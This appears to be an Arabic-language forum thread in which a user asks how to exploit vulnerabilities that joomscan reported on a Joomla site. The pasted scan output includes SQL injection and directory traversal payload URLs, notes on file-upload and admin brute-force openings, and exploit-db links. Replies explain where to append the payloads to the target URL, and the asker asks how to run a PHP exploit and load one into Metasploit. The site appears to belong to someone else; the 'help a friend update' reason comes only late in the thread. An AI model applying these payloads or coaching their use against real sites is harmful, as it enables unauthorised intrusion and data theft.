الرجاء المساعدة في استغلال ثغرات بـ سكربت جوملا

السلام عليكم و رحمة الله و بركاته

أخواتي انا فحصت موقع مركب سكربت جوملا بـ آداة joomscan عن طريق الباك تراك 4 و وجدة هذه الثغرات لكن ما عرفت كيف استغلها هل ممن الممكن شرح ذالك لي

Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact th
ere are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes


Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2
Vulnerable? Yes


Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes



Info -> Component: joomlaXplorer Local Directory Traversal Vulnerability
Versions Affected: 1.6.2 <=
Check: /components/com_joomlaxplorer/
Exploit:/index.php/?option=com_joomlaxplorer&action=show_error&dir=.. %2F..%2F..%2F%2F..%2F..%2Fetc
Vulnerable? Yes

Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /joomla/administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/M...%20PROTECT.pdf
Vulnerable? Yes

يا الغالي الموقع هاذ مليروم محدفوف يا الغالي انا اعطيل البديل
http://www.milw0rm.com/
هاذ البديل لي مليروم
http://www.exploit-db.com
باااااااااااااااي

وتلقي كل جديد والجديد قي انا الدي منزله في قيسم
هاذ الرابط
http://www.exploit-db.com/webapps/
وخلاص
بااااااااااااااي

يا اخي انا اعرف هذا على العموم شكراا

الاكسبلويت
في الميل ورم لكن اغلق من عامين

لكن تقريبا هذا الاستغلال جربه
http://www.exploit-db.com/exploits/10183/

ترجم الثغره

اخي الكريم الاتسغلال موجود بعد كلمة Exploit بعدها تحط الاستغلال بعد رابط الموقع
على فكرة تري الاداء ماتعطيك النتائج 100%
موفق

نعم إخوتي، كنت جربت هذا exploit لكن بعدما أدخل هذه command :
php myfile.php targetsite /joomla
أحصل على: [-] Error in connection, exiting

وجدت expolit اخر لكن لا أعلم إن كان صالحا:
http: // exploit-db.com / exploits/ 16906/
و لا أعرف كيف أمزجه مع Metasploit ، هل أنسخ الملف مع الملفات فيexploits ditrctory الخاص بالميتاسبلويت ؟؟؟
و كيف أشغله ؟؟


أرجوا المساعدة، أعرف أن هذه النسخة من joomla قديمة لذلك أريد نصح صديق لي بتحديث نسخة موقعه، بتجريب هذه الثغرة.
جزاكم الله خيرا.

لا أحد عنده إجابة لاستغلال هذه الثغرة القديييييمة ؟؟؟

بالتوفيق

كيف أخي hck !!!!!!!!

will see

مشكووووووووووور

شكرا على الردود